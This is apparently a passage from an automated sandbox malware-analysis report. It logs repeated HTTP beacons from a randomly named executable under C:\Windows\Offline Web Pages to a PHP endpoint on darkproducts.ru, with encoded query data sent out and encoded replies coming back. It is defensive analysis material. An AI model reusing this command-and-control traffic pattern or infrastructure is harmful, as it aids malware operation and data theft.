J5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:04:58.844311953 CET	939	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:04:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kyb3rJBPImUvvxOk%2F4jgH9q6zcv7klv7NL%2FcNzWpzEucoi1iHPLTqYvQ5YneRp%2FDD%2BV3oKM1OIuXLijGnHwzRf9iKetDcVgd2joZ2DgN%2BhHwrvsbFAgShYKsamz6InXevBL2956tfLXiHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43a49f852c461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4134&min_rtt=4134&rtt_var=2067&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50008	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:05:03.867233038 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:05:04.587675095 CET	934	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:05:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=marardD4uW6WpkUn5vUh9nsPBzJ75GjktcJCR%2Bo3zbLKgxINHpM3CtyGw0oHxn8udollQo8SwvbaKbwPJjUBYqW41LmgDgHK0lsGGXp1Wdk065XB7sRzje6JUdR0fk%2BG%2B6qClE9BDJK3sw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43a6dcd6941ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1757&rtt_var=878&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50009	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:05:09.599611998 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:05:10.341664076 CET	930	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:05:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LzhDT5MGUHTer0igacWczlVvVwLkeJpr2aKa27LZcFDc5TUVZ61espAEH2L0c6YPekdtP0T0cDh31p3nX9QWynPqmR1GddR5hu9nDFzQtwpi1OjgFzN77oocB6uLo8OHSLpm8NOr8ef%2BhQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43a919c0fc33e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1561&rtt_var=780&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50010	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:05:15.355986118 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:05:16.040446043 CET	941	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:05:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsjmHDoCFd9vQqfI69K3DX2ZpVHbg%2FYuCedPNsoVvP5%2Bu9xfA9dgW1GFmDMCQi1%2FFoH%2Fk%2F4CYXrdrVfzgq0gLJZgUokO235SGWRby74Ib1coSkknDd4fxoosYpM644IAtbks%2BWS1flaSSg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43ab57e887cfa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=2033&rtt_var=1016&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50011	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:05:21.059159994 CET	2237	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=d1nIiojIzEzN2kTOlRGNzIWYlVGZmBjYilTZlRDO5IGZ5gTY4UjIsIyN3MWMklTOxUjM3IGM4cjN3YzM4EzYzYWOzMDMjVzMzYWMkNGOzQDNiojI4gDM4cTN1UGNldDOmRGNyQWO1QWNxMWO1ATZiRGOiBjIsISN4EmMmNGNzMTO3kzY1cDMxMTOiRjMhVGN2UTZwQmYkJjMiNmMxYWZiojI5ETOhF2YmdjM5YjZmljZ4ATNiJzNwcTOkRDNlZjM0AjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:05:21.772321939 CET	932	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:05:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0eFSQxu8v2Q9Hwuf0%2FOp4zJIzqAoQur5SFQENeMkaF2nLFBbPrhI1ESwqm4oVDIatzF7zJjl1GA4zQ7oiT26xPkUBk6owSV0H4M%2BxJHIDjfPpZyC6swK8sccDu9FBTRsNUMr0u4tCq6Fw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43ad9482cc32b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1489&rtt_var=744&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2237&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50012	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:05:26.789386988 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:05:27.505848885 CET	936	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:05:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n5%2BmWT9Bei445rc%2FIf%2BtPCHIAKSvS0anAW7xf2ZbGu8OsXeGV9MpQs0qyr0a3Md7aoSOezApEZPupprmiCp45nJtkmYjXIy01LZv3HsJ2ISHN%2BGs85PznR0LpzyHsxsiZAP1bACJNYChjA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43afd08215e5f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1592&rtt_var=796&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50013	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:05:32.724333048 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:05:33.479701996 CET	936	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:05:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1UBxU%2FufDpYInuHMAduc%2BJSfS1hVjJ6zv3cecKspojcoxcqz02fx8IkTg1lwYd47kGAvuW7gBVt4XV2oRG%2FtPB7IuAfktTwue6Gp3sMGbkMEl9ouxSTMoW%2FL9558Gy7lbhmcGQqT8xtaHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43b223d17c42a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1577&rtt_var=788&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50014	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
